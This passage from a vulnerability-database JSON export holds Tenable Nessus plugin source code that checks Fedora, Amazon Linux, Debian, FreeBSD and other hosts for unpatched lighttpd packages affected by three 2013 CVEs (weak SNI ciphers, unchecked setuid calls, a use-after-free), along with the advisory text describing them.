script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"lighttpd-1.4.34-3.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:15", "bulletinFamily": "scanner", "description": "Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2014-2506.NASL", "href": "https://www.tenable.com/plugins/nessus/72652", "published": "2014-02-24T00:00:00", "title": "Fedora 19 : lighttpd-1.4.34-3.fc19 (2014-2506)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2506.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72652);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"FEDORA\", value:\"2014-2506\");\n\n script_name(english:\"Fedora 19 : lighttpd-1.4.34-3.fc19 (2014-2506)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=879185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=955145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=994444\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c1cdbb32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"lighttpd-1.4.34-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:13:55", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in lighttpd before 1.4.33 allows remote\nattackers to cause a denial of service (segmentation fault and crash)\nvia unspecified vectors that trigger FAMMonitorDirectory failures.\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network.\n\nlighttpd before 1.4.33 does not check the return value of the (1)\nsetuid, (2) setgid, or (3) setgroups functions, which might cause\nlighttpd to run as root if it is restarted and allows remote attackers\nto gain privileges, as demonstrated by multiple calls to the clone\nfunction that cause setuid to fail when the user process limit is\nreached.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2014-299.NASL", "href": "https://www.tenable.com/plugins/nessus/72947", "published": "2014-03-12T00:00:00", "title": "Amazon Linux AMI : lighttpd (ALAS-2014-299)", "type": "nessus", "sourceData": "#\n# (C) Tenable 
Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-299.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72947);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_xref(name:\"ALAS\", value:\"2014-299\");\n\n script_name(english:\"Amazon Linux AMI : lighttpd (ALAS-2014-299)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in lighttpd before 1.4.33 allows remote\nattackers to cause a denial of service (segmentation fault and crash)\nvia unspecified vectors that trigger FAMMonitorDirectory failures.\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network.\n\nlighttpd before 1.4.33 does not check the return value of the (1)\nsetuid, (2) setgid, or (3) setgroups functions, which might cause\nlighttpd to run as root if it is restarted and allows remote attackers\nto gain privileges, as demonstrated by multiple calls to the clone\nfunction that cause setuid to fail when the user process limit is\nreached.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-299.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update lighttpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"lighttpd-debuginfo-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-fastcgi-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_geoip-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-fastcgi / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:15", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web\nserver.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\n - CVE-2013-4508\n It was discovered that lighttpd uses weak ssl ciphers\n when SNI (Server Name Indication) is enabled. This issue\n was solved by ensuring that stronger ssl ciphers are\n used when SNI is selected.\n\n - CVE-2013-4559\n The clang static analyzer was used to discover privilege\n escalation issues due to missing checks around\n lighttpd", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-2795.NASL", "href": "https://www.tenable.com/plugins/nessus/70982", "published": "2013-11-21T00:00:00", "title": "Debian DSA-2795-2 : lighttpd - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2795. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70982);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/28 22:47:42\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"DSA\", value:\"2795\");\n\n script_name(english:\"Debian DSA-2795-2 : lighttpd - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the lighttpd web\nserver.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\n - CVE-2013-4508\n It was discovered that lighttpd uses weak ssl ciphers\n when SNI (Server Name Indication) is enabled. This issue\n was solved by ensuring that stronger ssl ciphers are\n used when SNI is selected.\n\n - CVE-2013-4559\n The clang static analyzer was used to discover privilege\n escalation issues due to missing checks around\n lighttpd's setuid, setgid, and setgroups calls. 
Those\n are now appropriately checked.\n\n - CVE-2013-4560\n The clang static analyzer was used to discover a\n use-after-free issue when the FAM stat cache engine is\n enabled, which is now fixed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729453\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4560\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2795\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lighttpd packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.4.31-4+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-doc\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-doc\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif 
(deb_check(release:\"7.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.31-4+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:39:01", "bulletinFamily": "scanner", "description": "lighttpd security advisories report :\n\nIt is possible to inadvertently enable vulnerable ciphers when using\nssl.cipher-list.\n\nIn certain cases setuid() and similar can fail, potentially triggering\nlighttpd to restart running as root.\n\nIf FAMMonitorDirectory fails, the memory intended to store the context\nis released; some lines below the ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "href": "https://www.tenable.com/plugins/nessus/72494", "published": "2014-02-14T00:00:00", "title": "FreeBSD : lighttpd -- multiple vulnerabilities (90b27045-9530-11e3-9d09-000c2980a9f3)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72494);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n\n script_name(english:\"FreeBSD : lighttpd -- multiple vulnerabilities (90b27045-9530-11e3-9d09-000c2980a9f3)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"lighttpd security advisories report :\n\nIt is possible to inadvertantly 
enable vulnerable ciphers when using\nssl.cipher-list.\n\nIn certain cases setuid() and similar can fail, potentially triggering\nlighttpd to restart running as root.\n\nIf FAMMonitorDirectory fails, the memory intended to store the context\nis released; some lines below the 'version' compoment of that context\nis read. Reading invalid data doesn't matter, but the memory access\ncould trigger a segfault.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_02.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_03.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/90b27045-9530-11e3-9d09-000c2980a9f3.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17e31e6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd<1.4.34\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:48:19", "bulletinFamily": "scanner", "description": "According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.34. It is, therefore, affected by the following\nvulnerabilities :\n\n - When Server Name Indication (SNI) is enabled, a flaw\n exists that could cause the application to use all\n available SSL ciphers, including weak ciphers. Remote\n attackers could potentially hijack sessions or obtain\n sensitive information by sniffing the network.\n Note only versions 1.4.24 to 1.4.33 are affected.\n (CVE-2013-4508)\n\n - A flaw, found with the clang static analyzer, exists\n because lighttpd fails to perform checks around setuid\n (1), setgid (2), and setgroups (3) calls. This could\n allow a remote attacker to gain elevated privileges. 
(CVE-2013-4559)\n\n - A use-after-free error, found with the clang static\n analyzer, exists when the FAM stat cache engine is\n enabled. This could allow remote attackers to\n dereference already freed memory and crash the program.\n (CVE-2013-4560)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-11-02T00:00:00", "id": "LIGHTTPD_1_4_34.NASL", "href": "https://www.tenable.com/plugins/nessus/72815", "published": "2014-03-05T00:00:00", "title": "lighttpd < 1.4.34 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72815);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n\n script_name(english:\"lighttpd < 1.4.34 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.34. It is, therefore, affected by the following\nvulnerabilities :\n\n - 